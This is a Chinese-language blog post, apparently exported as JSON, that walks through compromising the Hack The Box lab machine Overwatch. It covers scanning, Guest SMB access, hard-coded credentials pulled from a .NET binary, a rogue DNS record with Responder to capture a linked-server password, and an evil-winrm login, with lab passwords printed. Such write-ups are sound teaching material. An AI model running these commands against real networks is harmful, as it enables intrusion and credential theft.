{"id":386,"date":"2026-01-31T23:59:00","date_gmt":"2026-01-31T15:59:00","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=386"},"modified":"2026-01-31T16:13:02","modified_gmt":"2026-01-31T08:13:02","slug":"386","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2026\/01\/31\/386\/","title":{"rendered":"HTB\u9776\u673a Overwatch \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.129.12.119<\/strong><\/code><strong>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.12.119 (10.129.12.119) 56(84) bytes of data.\n64 bytes from 10.129.12.119: icmp_seq=1 ttl=127 time=854 ms\n64 bytes from 10.129.12.119: icmp_seq=2 ttl=127 time=365 ms\n64 bytes from 10.129.12.119: icmp_seq=3 ttl=127 time=287 ms\n64 bytes from 10.129.12.119: icmp_seq=4 ttl=127 time=329 ms\n\n--- 10.129.12.119 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3000ms\nrtt min\/avg\/max\/mdev = 287.127\/458.706\/853.589\/229.662 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.98 scan initiated Sun Jan 25 08:35:51 2026 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.12.119\nNmap scan report for 10.129.12.119\nHost is up (0.28s latency).\nAll 65535 scanned ports on 10.129.12.119 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Jan 25 08:36:39 2026 -- 1 IP address (1 host up) scanned in 48.41 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.98 scan initiated Sun Jan 25 08:38:34 2026 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.12.119\nNmap scan report for 10.129.12.119\nHost is up (0.30s latency).\nNot shown: 65517 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-25 00:39:34Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  tcpwrapped\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)\n3389\/tcp  open  ms-wbt-server Microsoft Terminal Services\n|_ssl-date: 2026-01-25T00:41:19+00:00; +2s from scanner time.\n| ssl-cert: Subject: commonName=S200401.overwatch.htb\n| Not valid before: 2025-12-07T15:16:06\n|_Not valid after:  2026-06-08T15:16:06\n| rdp-ntlm-info: \n|   Target_Name: OVERWATCH\n|   NetBIOS_Domain_Name: OVERWATCH\n|   NetBIOS_Computer_Name: S200401\n|   DNS_Domain_Name: overwatch.htb\n|   DNS_Computer_Name: S200401.overwatch.htb\n|   DNS_Tree_Name: overwatch.htb\n|   Product_Version: 10.0.20348\n|_  System_Time: 2026-01-25T00:40:39+00:00\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n6520\/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM\n| ms-sql-info: \n|   10.129.12.119:6520: \n|     Version: \n|       name: Microsoft SQL Server 2022 RTM\n|       number: 16.00.1000.00\n|       Product: Microsoft SQL Server 2022\n|       Service pack level: RTM\n|       Post-SP patches applied: false\n|_    TCP port: 6520\n| ms-sql-ntlm-info: \n|   10.129.12.119:6520: \n|     Target_Name: OVERWATCH\n|     NetBIOS_Domain_Name: OVERWATCH\n|     NetBIOS_Computer_Name: S200401\n|     DNS_Domain_Name: overwatch.htb\n|     DNS_Computer_Name: S200401.overwatch.htb\n|     DNS_Tree_Name: overwatch.htb\n|_    Product_Version: 10.0.20348\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2026-01-24T21:51:36\n|_Not valid after:  2056-01-24T21:51:36\n|_ssl-date: 2026-01-25T00:41:19+00:00; +1s from scanner time.\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49664\/tcp open  msrpc         Microsoft Windows RPC\n49668\/tcp open  msrpc         Microsoft Windows RPC\n63519\/tcp open  msrpc         Microsoft Windows RPC\n63902\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2022 (88%)\nOS CPE: cpe:\/o:microsoft:windows_server_2022\nAggressive OS guesses: Microsoft Windows Server 2022 (88%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Host: S200401; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-time: \n|   date: 2026-01-25T00:40:41\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3.1.1: \n|_    Message signing enabled and required\n|_clock-skew: mean: 1s, deviation: 0s, median: 0s\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   315.97 ms 10.10.14.1\n2   316.15 ms 10.129.12.119\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jan 25 08:41:28 2026 -- 1 IP address (1 host up) scanned in 173.98 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.98 scan initiated Sun Jan 25 08:44:07 2026 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.12.119\nNmap scan report for 10.129.12.119\nHost is up (0.27s latency).\nNot shown: 65531 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Sun Jan 25 08:45:16 2026 -- 1 IP address (1 host up) scanned in 69.07 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3a<code>Windows Server 2022<\/code>\uff0c\u4e14\u5b89\u88c5\u4e86\u57df\u63a7\u670d\u52a1\uff0c\u4e3b\u57df\u540d\u4e3a<code>overwatch.htb<\/code>\uff0c\u57df\u63a7\u4e3b\u673a\u540d\u4e3a<code>S200401<\/code>\uff0c\u8fd8\u5f00\u542f\u4e86<code>3389\/rdp<\/code>\u548c<code>mssql\/6250<\/code>\u670d\u52a1\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>DNS\u670d\u52a1\uff0853\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>dig<\/code>\u547d\u4ee4\u67e5\u8be2\u5173\u4e8e\u4e3b\u57df\u540d\u7684\u8bb0\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">dig any overwatch.htb @S200401.overwatch.htb<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769303528448-5f2e1720-66a7-4908-ae0b-ba5a28803949.png\" alt=\"\" \/><\/p>\n<p>\u9664\u57df\u63a7\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u6709\u6548\u8bb0\u5f55\u3002<\/p>\n<h2>Windows SMB\u670d\u52a1\uff08445\u7aef\u53e3\uff09<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u8bbf\u5ba2\u8d26\u6237<code>Guest<\/code>\u767b\u5f55\u9776\u673a<code>SMB<\/code>\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb s200401.overwatch.htb -d overwatch.htb -u Guest -p \"\"<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769309032721-d0414a94-0bf1-4ae0-8e39-91171dd5440e.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>Guest<\/code>\u7528\u6237\u4e3a\u542f\u7528\u72b6\u6001\uff0c\u4f7f\u7528<code>impacket-smbclient<\/code>\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-smbclient overwatch.htb\/Guest@s200401.overwatch.htb -no-pass<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769309253723-44952c95-3307-4ba3-86f4-8103613f5bc4.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>SMB<\/code>\u670d\u52a1\u5b58\u5728<code>software<\/code>\u5171\u4eab\uff0c\u63a2\u67e5\u5171\u4eab\u5185\u7684\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\">use software$\nls<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769312396423-8c0dc910-a1db-42bf-84e8-9d2ec4e6465e.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5b50\u76ee\u5f55<code>Monitoring<\/code>\uff0c\u4f7f\u7528<code>ls<\/code>\u547d\u4ee4\u5217\u51fa\u76ee\u5f55\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769476455537-181fd36a-d11f-4958-973e-3dd012ed3919.png\" alt=\"\" \/><\/p>\n<p>\u8be5\u76ee\u5f55\u8c8c\u4f3c\u4e3a<code>overwatch.exe<\/code>\u7684\u5e94\u7528\u7a0b\u5e8f\u4e3b\u76ee\u5f55\uff0c\u67e5\u770b<code>overwatch.exe.config<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">&lt;?xml version=\"1.0\" encoding=\"utf-8\"?&gt;\n&lt;configuration&gt;\n  &lt;configSections&gt;\n    &lt;!-- For more information on Entity Framework configuration, visit http:\/\/go.microsoft.com\/fwlink\/?LinkID=237468 --&gt;\n    &lt;section name=\"entityFramework\" type=\"System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\" requirePermission=\"false\" \/&gt;\n  &lt;\/configSections&gt;\n  &lt;system.serviceModel&gt;\n    &lt;services&gt;\n      &lt;service name=\"MonitoringService\"&gt;\n        &lt;host&gt;\n          &lt;baseAddresses&gt;\n            &lt;add baseAddress=\"http:\/\/overwatch.htb:8000\/MonitorService\" \/&gt;\n          &lt;\/baseAddresses&gt;\n        &lt;\/host&gt;\n        &lt;endpoint address=\"\" binding=\"basicHttpBinding\" contract=\"IMonitoringService\" \/&gt;\n        &lt;endpoint address=\"mex\" binding=\"mexHttpBinding\" contract=\"IMetadataExchange\" \/&gt;\n      &lt;\/service&gt;\n    &lt;\/services&gt;\n    # ... more lines\n  &lt;\/system.serviceModel&gt;\n  &lt;entityFramework&gt;\n    &lt;providers&gt;\n      &lt;provider invariantName=\"System.Data.SqlClient\" type=\"System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer\" \/&gt;\n      &lt;provider invariantName=\"System.Data.SQLite.EF6\" type=\"System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6\" \/&gt;\n    &lt;\/providers&gt;\n  &lt;\/entityFramework&gt;\n  # ... more lines\n&lt;\/configuration&gt;<\/code><\/pre>\n<p>\u53d1\u73b0<code>overwatch.exe<\/code>\u7684\u670d\u52a1\u540d\u4f3c\u4e4e\u4e3a<code>MonitoringService<\/code>\uff0c\u5728\u5185\u7f51<code>8080<\/code>\u7aef\u53e3\u5f00\u542f\u4e86<code>HTTP<\/code>\u670d\u52a1\uff0c\u8def\u5f84\u4e3a<code>\/MonitorService<\/code>\uff0c\u8fd8\u4f7f\u7528\u4e86<code>SqlClient<\/code>\u5e93\u3002<\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u5176\u5b83\u4fe1\u606f\u3002<\/p>\n<h2>Active Directory\u670d\u52a1<\/h2>\n<p>\u5c1d\u8bd5\u4f7f\u7528<code>Kerberos<\/code>\u5bf9<code>Guest<\/code>\u8fdb\u884c\u8ba4\u8bc1\uff1a<\/p>\n<pre><code class=\"language-shell\">netexec ldap -d overwatch.htb -u Guest -p \"\" -k s200401.overwatch.htb<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769477378673-ccb4a51e-6d6d-4d4f-9355-ce248c3fe9a2.png\" alt=\"\" \/><\/p>\n<p>\u8ba4\u8bc1\u6210\u529f\uff01\u540c\u65f6\u53d1\u73b0<code>LDAP<\/code>\u670d\u52a1\u672a\u8fdb\u884c\u7b7e\u540d\u3002<\/p>\n<p>\u76f4\u63a5\u4f7f\u7528<code>impacket-lookupsid<\/code>\u5de5\u5177\u7206\u7834\u57df\u5185<code>RID<\/code>\u83b7\u53d6\u7528\u6237\u540d\u5217\u8868\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-lookupsid overwatch.htb\/Guest@s200401.overwatch.htb -no-pass -domain-sids 40000<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769477816061-3de034e9-4889-4b74-95c1-b25618188d3b.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5982\u4e0b\u7528\u6237\uff0c\u76f4\u63a5\u4fdd\u5b58\u5230<code>aduser.lst<\/code>\u5185\uff1a<\/p>\n<pre><code class=\"language-plain\">Administrator   Guest   krbtgt  S200401$        sqlsvc\nsqlmgmt SQL03$  NB001$  NB002$  FILE01$\nS200400$        Charlie.Moss    Tracy.Burns     Kathryn.Bryan   Rachael.Thomas\nAimee.Smith     Duncan.Freeman  John.Begum      Bernard.Hilton  Kim.Hargreaves\nDouglas.Burrows Carole.Murray   Olivia.Quinn    Trevor.Baker    Kenneth.Dennis\nJeremy.Marshall Jodie.Jones     Thomas.Lee      Terence.Matthews        Colin.Roberts\nAaron.Robinson  Amanda.Jenkins  Debra.Arnold    Michelle.Willis Kayleigh.Jones\nAdam.Russell    Tracey.Kelly    Bethan.Dale     Mandy.Wood      Jenna.Phillips\nCarole.Yates    Graham.Perry    Catherine.Griffiths     Shaun.Jackson   Bethan.Rogers\nEllie.Singh     Marie.Allan     Patrick.Holmes  Victor.Hopkins  Geraldine.Harper\nGeorge.Todd     Karl.Smith      Jacqueline.Norton       Frederick.Murray        Joe.Pearce\nPaul.Collins    Damien.Edwards  Eileen.Phillips Carl.Johnson    Kevin.Newton\nNatalie.Higgins Francis.Weston  Benjamin.Davison        Martin.Kemp     Angela.Jones\nGareth.Ahmed    Deborah.Morgan  Grace.Taylor    Roger.Hughes    Albert.Barrett\nGrace.Curtis    Marilyn.Griffiths       Tracey.Barker   Suzanne.Hughes  Timothy.Jackson\nBeverley.Thompson       Clare.Bartlett  Irene.Johnson   Bernard.Wood    Frank.McCarthy\nElaine.Page     Elaine.Walker   Mohammad.Hill   Glenn.Field     Deborah.Martin\nGail.Sullivan   Maureen.Kirby   Georgina.Chambers       Philip.Harris   Samantha.Scott\nAnn.Hill        Chloe.Cox       Jamie.Gough     Frederick.Hussain       Dean.Hobbs\nDanielle.Moore  Timothy.Smith   Declan.Stone    Jacob.Wilson    Gary.Elliott\nPeter.Slater    Louise.Walton   Brett.Haynes    Elliot.Green    Wendy.Williams\nGraham.Parker   Abdul.Stevens   Brett.Bailey    Benjamin.Harrison       Emily.Cooper\nRoger.Spencer<\/code><\/pre>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>\u67e5\u770b.NET\u7a0b\u5e8fIL\u4ee3\u7801\u53d1\u73b0\u51ed\u636e<\/h2>\n<p>\u5728\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u9776\u673a<code>Guest<\/code>\u7528\u6237\u5904\u4e8e\u5f00\u542f\u72b6\u6001\uff0c\u5e76\u4f7f\u7528\u5176\u767b\u5f55\u4e86<code>SMB<\/code>\u5171\u4eab\u3002\u7531\u4e8e\u540e\u7eed\u672a\u6536\u96c6\u5230\u5176\u5b83\u6709\u6548\u4fe1\u606f\uff0c\u63a8\u6d4b<code>SMB<\/code>\u5171\u4eab\u5185\u7684<code>overwatch.exe<\/code>\u5b58\u5728\u64cd\u4f5c\u6570\u636e\u5e93\u7684\u529f\u80fd\uff0c\u4e8e\u662f\u51b3\u5b9a\u4e0b\u8f7d\u8be5\u7a0b\u5e8f\uff0c\u8fdb\u884c\u9006\u5411\u5206\u6790\u3002<\/p>\n<p>\u76f4\u63a5\u767b\u5f55<code>SMB<\/code>\uff0c\u4f7f\u7528<code>get<\/code>\u547d\u4ee4\u4e0b\u8f7d\u8be5\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-plain\">get overwatch.exe<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528<code>IDA Pro<\/code>\u6253\u5f00\uff0c\u53d1\u73b0\u8be5\u7a0b\u5e8f\u4f7f\u7528<code>.NET<\/code>\u8bed\u8a00\u7f16\u5199\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769496540466-b763204e-217f-46fa-ada2-b10731e80988.png\" alt=\"\" \/><\/p>\n<p>\u7ffb\u9605<code>IL<\/code>\u4ee3\u7801\uff0c\u5728<code>Program__CheckEdgeHistory<\/code>\u65b9\u6cd5\u4e2d\u53d1\u73b0\u4e86\u786c\u7f16\u7801\u4e86\u6570\u636e\u5e93\u8fde\u63a5\u51ed\u636e\u7684\u5b57\u7b26\u4e32\u53d8\u91cf<code>aServerLocalhos<\/code>\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769496632482-3acfb574-e7c8-4d6e-8a50-9a5990b752ab.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u57df\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>overwatch.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>sqlsvc<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>TI0LKcfHzZw1Vv<\/code><\/li>\n<\/ul>\n<p>\u4f7f\u7528<code>crackmapexec<\/code>\u9a8c\u8bc1\u51ed\u636e\uff1a<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb s200401.overwatch.htb -d overwatch.htb -u sqlsvc -p \"TI0LKcfHzZw1Vv\"<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769496889463-b703136a-77b1-4e76-9cf0-81b9a9d6db35.png\" alt=\"\" \/><\/p>\n<p>\u767b\u5f55\u6210\u529f\uff01<\/p>\n<h2>\u4fee\u6539DNS\u8bb0\u5f55\u83b7\u53d6\u94fe\u63a5\u670d\u52a1\u5668\u51ed\u636e<\/h2>\n<p>\u83b7\u53d6<code>sqlsvc<\/code>\u7528\u6237\u51ed\u636e\u540e\uff0c\u4f7f\u7528\u5176\u767b\u5f55<code>SQL Server<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">impacket-mssqlclient overwatch.htb\/sqlsvc:\"TI0LKcfHzZw1Vv\"@s200401.overwatch.htb -port 6520 -windows-auth<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769515836285-822e5cce-2657-43a6-9be2-bde51a642e4a.png\" alt=\"\" \/><\/p>\n<p>\u767b\u5f55\u6210\u529f\u540e\uff0c\u5c1d\u8bd5\u679a\u4e3e\u6570\u636e\u5e93\u5185\u6ce8\u518c\u7684\u94fe\u63a5\u670d\u52a1\u5668\uff1a<\/p>\n<pre><code class=\"language-shell\">enum_links<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769515901262-24a058ed-6f85-4489-9ac7-d8d6ade8139c.png\" alt=\"\" \/><\/p>\n<p>\u9664\u4e86\u5f53\u524d\u5b9e\u4f8b\u5916<code>S200401<\/code>\u5916\uff0c\u6570\u636e\u5e93\u5185\u8fd8\u6ce8\u518c\u4e86\u4e00\u53f0\u4e3b\u673a\u540d\u4e3a<code>SQL07<\/code>\u7684\u5b9e\u4f8b\u3002\u5c1d\u8bd5\u8fde\u63a5\u8be5\u5b9e\u4f8b\uff1a<\/p>\n<pre><code class=\"language-shell\">use_link [SQL07]<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769516058957-0fb0cd75-6403-4bf5-b9cc-d59d7c1148f1.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u65e0\u6cd5\u8fde\u63a5\u5230\u8be5\u6570\u636e\u5e93\u5b9e\u4f8b\uff0c\u63d0\u793a\u8fde\u63a5\u8d85\u65f6\u3002\u601d\u8003\u7247\u523b\u540e\uff0c\u51b3\u5b9a\u4f7f\u7528<code>dig<\/code>\u547d\u4ee4\u67e5\u8be2<code>SQL07<\/code>\u4e3b\u673a\u7684<code>DNS<\/code>\u8bb0\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">dig any sql07.overwatch.htb @s200401.overwatch.htb<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769516217975-615220dc-510e-4043-b80d-5c2e57061875.png\" alt=\"\" \/><\/p>\n<p>\u4f46\u9776\u673a<code>DNS<\/code>\u6570\u636e\u5e93\u5185\u6839\u672c\u4e0d\u5b58\u5728\u8be5\u4e3b\u673a\u7684\u8bb0\u5f55\u4fe1\u606f\u3002<\/p>\n<p>\u7531\u4e8e\u5f53\u524d\u6211\u4eec\u5df2\u7ecf\u83b7\u53d6\u4e86\u57df\u5185\u666e\u901a\u7528\u6237<code>sqlsvc<\/code>\u7684\u8bbf\u95ee\u6743\u9650\uff0c\u53ef\u4ee5\u5411<code>DNS<\/code>\u6570\u636e\u5e93\u5185\u6dfb\u52a0\u4efb\u610f\u8bb0\u5f55\uff0c\u51b3\u5b9a\u624b\u52a8\u5411\u9776\u673a\u6dfb\u52a0\u5173\u4e8e<code>sql07<\/code>\u4e3b\u673a\u7684<code>A<\/code>\u7c7b\u8bb0\u5f55\uff0c\u5c06<code>IP<\/code>\u6307\u5411\u653b\u51fb\u673a\uff1b\u6dfb\u52a0\u5b8c\u6210\u540e\uff0c\u5728\u672c\u5730\u542f\u52a8<code>responder<\/code>\u76d1\u542c\uff0c\u968f\u540e\u5728<code>impacket-mssqlclient<\/code>\u4e2d\u6267\u884c\u547d\u4ee4\u8fde\u63a5<code>SQL07<\/code>\u94fe\u63a5\u670d\u52a1\u5668\uff0c\u4ee5\u6b64\u5c1d\u8bd5\u83b7\u53d6\u7ba1\u7406\u5458\u914d\u7f6e\u7684\u767b\u5f55\u51ed\u636e\u3002<\/p>\n<p>\u9996\u5148\uff0c\u4f7f\u7528<code>bloodyAD<\/code>\u5de5\u5177\u6dfb\u52a0\u6076\u610f<code>DNS<\/code>\u8bb0\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">bloodyAD -d overwatch.htb -u sqlsvc -p \"TI0LKcfHzZw1Vv\" --dc-ip 10.129.13.189 add dnsRecord sql07 \"10.10.16.117\"<\/code><\/pre>\n<p>\u6dfb\u52a0\u6210\u529f\u540e\uff0c\u542f\u52a8<code>responder<\/code>\u76d1\u542c\uff1a<\/p>\n<pre><code class=\"language-shell\">responder -I tun0<\/code><\/pre>\n<p>\u6700\u540e\u4f7f\u7528<code>impacket-mssqlclient<\/code>\u767b\u5f55\u6570\u636e\u5e93\uff0c\u518d\u6b21\u6267\u884c<code>use_link [SQL07]<\/code>\u547d\u4ee4\uff0c\u6b64\u65f6\uff0c\u767b\u5f55\u8bf7\u6c42\u5c06\u88ab\u53d1\u5f80<code>responder<\/code>\u63a7\u5236\u7684\u6076\u610f\u670d\u52a1\uff1a<\/p>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769517041173-c25a81db-75ba-4057-974b-32068803592e.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u6355\u83b7\u57df\u5185\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u57df\uff1a<code>overwatch.htb<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>sqlmgmt<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>bIhBbzMMnB82yx<\/code><\/li>\n<\/ul>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u8be5\u51ed\u636e\u767b\u5f55<code>WinRM<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i s200401.overwatch.htb -u sqlmgmt -p \"bIhBbzMMnB82yx\"<\/code><\/pre>\n<p><!-- \u8fd9\u662f\u4e00\u5f20\u56fe\u7247\uff0cocr \u5185\u5bb9\u4e3a\uff1a --><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/42816956\/1769517349861-779276cc-f357-4992-9576-7dfa3758937a.png\" alt=\"\" \/><\/p>\n<p><strong>\u767b\u5f55\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr 